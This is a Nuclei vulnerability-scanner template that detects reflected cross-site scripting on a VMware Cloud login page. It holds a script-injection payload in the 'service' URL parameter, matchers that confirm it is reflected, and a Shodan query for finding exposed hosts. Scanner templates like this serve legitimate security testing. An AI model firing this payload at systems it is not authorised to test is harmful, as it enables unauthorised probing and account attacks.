id: vmware-cloud-xss

info:
  name: VMWare Cloud - Cross Site Scripting
  author: tess
  severity: medium
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Vmware Cloud"
  tags: vmware,xss,cloud

http:
  - method: GET
    path:
      - '{{BaseURL}}/login/?redirectTo=/tenant/e&service=</script><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'
          - 'let tokens = "'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100b59359e8a676ff3b2d8e4d14957947205ff8b6734289f7ebb17640c0c09f32b2022100f62173b2118108562fecfecc049fbabc3455d3f1c4220091975a826339a6b3ee:922c64590222798bb761d5b6d8e72950
